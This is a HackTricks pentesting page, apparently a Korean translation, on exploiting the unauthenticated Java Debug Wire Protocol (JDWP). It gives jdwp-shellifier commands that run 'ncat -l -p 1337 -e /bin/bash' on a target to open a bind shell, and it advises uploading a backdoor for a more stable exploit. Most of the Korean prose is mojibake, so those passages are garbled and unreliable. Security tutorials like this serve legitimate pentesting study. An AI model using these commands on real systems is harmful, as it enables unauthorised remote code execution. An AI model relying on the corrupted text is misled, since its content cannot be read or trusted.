# Pentesting JDWP - Java Debug Wire Protocol
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
**μ·¨μ½μ νκ° λ° μΉ¨ν¬ ν
μ€νΈλ₯Ό μν μ¦μ μ¬μ© κ°λ₯ν μ€μ **. 20κ° μ΄μμ λꡬ λ° κΈ°λ₯μ μ¬μ©νμ¬ μ΄λμλ μ 체 μΉ¨ν¬ ν
μ€νΈλ₯Ό μ€ννμΈμ. μ°λ¦¬λ μΉ¨ν¬ ν
μ€ν°λ₯Ό λ체νμ§ μμ΅λλ€ - μ°λ¦¬λ κ·Έλ€μ΄ λ κΉμ΄ νκ³ λ€κ³ , μμ ν°λ¨λ¦¬κ³ , μ¬λ―Έλ₯Ό λλ μ μλλ‘ λ§μΆ€ν λꡬ, νμ§ λ° μ
μ© λͺ¨λμ κ°λ°ν©λλ€.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## Exploiting
JDWP μ
μ©μ **νλ‘ν μ½μ μΈμ¦ λ° μνΈν λΆμ‘±**μ λ¬λ € μμ΅λλ€. μΌλ°μ μΌλ‘ **ν¬νΈ 8000**μμ λ°κ²¬λμ§λ§ λ€λ₯Έ ν¬νΈλ κ°λ₯ν©λλ€. μ΄κΈ° μ°κ²°μ λμ ν¬νΈμ "JDWP-Handshake"λ₯Ό μ μ‘νμ¬ μ΄λ£¨μ΄μ§λλ€. JDWP μλΉμ€κ° νμ±νλμ΄ μμΌλ©΄ λμΌν λ¬Έμμ΄λ‘ μλ΅νμ¬ μ‘΄μ¬λ₯Ό νμΈν©λλ€. μ΄ νΈλμ
°μ΄ν¬λ λ€νΈμν¬μμ JDWP μλΉμ€λ₯Ό μλ³νλ μ§λ¬Έ μΈμ λ°©λ²μΌλ‘ μμ©ν©λλ€.
νλ‘μΈμ€ μλ³ μΈ‘λ©΄μμ Java νλ‘μΈμ€μμ "jdwk" λ¬Έμμ΄μ κ²μνλ©΄ νμ± JDWP μΈμ
μ λνλΌ μ μμ΅λλ€.
μ£Όμ λꡬλ [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier)μ
λλ€. λ€μν 맀κ°λ³μμ ν¨κ» μ¬μ©ν μ μμ΅λλ€:
```bash
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
```
I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
## More details
**This is a summary of [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Check it for further details.
1. **JDWP κ°μ**:
- ν¨ν· κΈ°λ°μ λ€νΈμν¬ μ΄μ§ νλ‘ν μ½λ‘, μ£Όλ‘ λκΈ°μμ
λλ€.
- μΈμ¦ λ° μνΈνκ° λΆμ‘±νμ¬ μ λμ μΈ λ€νΈμν¬μ λ
ΈμΆλ κ²½μ° μ·¨μ½ν©λλ€.
2. **JDWP νΈλμ
°μ΄ν¬**:
- ν΅μ μ μμνκΈ° μν΄ κ°λ¨ν νΈλμ
°μ΄ν¬ νλ‘μΈμ€κ° μ¬μ©λ©λλ€. λλ²κ±°(ν΄λΌμ΄μΈνΈ)μ λλ²κΈ°(μλ²) κ°μ 14μ ASCII λ¬Έμμ΄ βJDWP-Handshakeβκ° κ΅νλ©λλ€.
3. **JDWP ν΅μ **:
- λ©μμ§λ κΈΈμ΄, ID, νλκ·Έ λ° λͺ
λ Ή μ§ν©κ³Ό κ°μ νλλ₯Ό κ°μ§ κ°λ¨ν ꡬ쑰λ₯Ό κ°μ§κ³ μμ΅λλ€.
- CommandSet κ°μ 0x40μμ 0x80κΉμ§ λ€μνλ©°, μλ‘ λ€λ₯Έ λμ λ° μ΄λ²€νΈλ₯Ό λνλ
λλ€.
4. **μ
μ©**:
- JDWPλ μμμ ν΄λμ€μ λ°μ΄νΈμ½λλ₯Ό λ‘λνκ³ νΈμΆν μ μμ΄ λ³΄μ μνμ μ΄λν©λλ€.
- μ΄ κΈ°μ¬λ Java Runtime μ°Έμ‘°λ₯Ό κ°μ Έμ€κ³ , μ€λ¨μ μ μ€μ νκ³ , λ©μλλ₯Ό νΈμΆνλ λ€μ― λ¨κ³μ μ
μ© νλ‘μΈμ€λ₯Ό μμΈν μ€λͺ
ν©λλ€.
5. **μ€μ μ
μ©**:
- μ μ¬μ μΈ λ°©νλ²½ 보νΈμλ λΆκ΅¬νκ³ JDWP μλΉμ€λ λ°κ²¬ κ°λ₯νλ©° μ€μ μλ리μ€μμ μ
μ©λ μ μμ΅λλ€. μ΄λ ShodanHQ λ° GitHubμ κ°μ νλ«νΌμμμ κ²μμ ν΅ν΄ μ
μ¦λ©λλ€.
- μ΄ μ
μ© μ€ν¬λ¦½νΈλ λ€μν JDK λ²μ μμ ν
μ€νΈλμμΌλ©° νλ«νΌμ λ
립μ μ΄λ©° μ λ’°ν μ μλ μ격 μ½λ μ€ν(RCE)μ μ 곡ν©λλ€.
6. **보μ μλ―Έ**:
- μΈν°λ·μ μ΄λ¦° JDWP μλΉμ€μ μ‘΄μ¬λ μ κΈ°μ μΈ λ³΄μ κ²ν , νλ‘λμ
μμ λλ²κ·Έ κΈ°λ₯ λΉνμ±ν λ° μ μ ν λ°©νλ²½ ꡬμ±μ νμμ±μ κ°μ‘°ν©λλ€.
### **References:**
* [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)]
* [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)
* [http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html](http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html)
* http://www.secdev.org/projects/scapy(no longer active)
* [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE)
* http://www.hsc-news.com/archives/2013/000109.html (no longer active)
* [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt)
* https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults
* [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html)
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com)
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
* [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
**μ¦μ μ¬μ© κ°λ₯ν μ·¨μ½μ νκ° λ° μΉ¨ν¬ ν
μ€νΈ μ€μ **. 20κ° μ΄μμ λꡬ λ° κΈ°λ₯μ μ¬μ©νμ¬ μ΄λμλ μ 체 μΉ¨ν¬ ν
μ€νΈλ₯Ό μ€ννμΈμ. μ°λ¦¬λ μΉ¨ν¬ ν
μ€ν°λ₯Ό λ체νμ§ μμΌλ©°, κ·Έλ€μ΄ λ κΉμ΄ νκ³ λ€κ³ , μμ ν°λ¨λ¦¬κ³ , μ¬λ―Έλ₯Ό λλ μ μλλ‘ λ§μΆ€ν λꡬ, νμ§ λ° μ
μ© λͺ¨λμ κ°λ°ν©λλ€.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{% hint style="success" %}
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks μ§μνκΈ°
* [**ꡬλ
κ³ν**](https://github.com/sponsors/carlospolop) νμΈνκΈ°!
* **π¬ [**Discord κ·Έλ£Ή**](https://discord.gg/hRep4RUj7f) λλ [**ν
λ κ·Έλ¨ κ·Έλ£Ή**](https://t.me/peass)μ μ°Έμ¬νκ±°λ **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**λ₯Ό νλ‘μ°νμΈμ.**
* **ν΄νΉ νΈλ¦μ 곡μ νλ €λ©΄ [**HackTricks**](https://github.com/carlospolop/hacktricks) λ° [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 리ν¬μ§ν 리μ PRμ μ μΆνμΈμ.**
{% endhint %}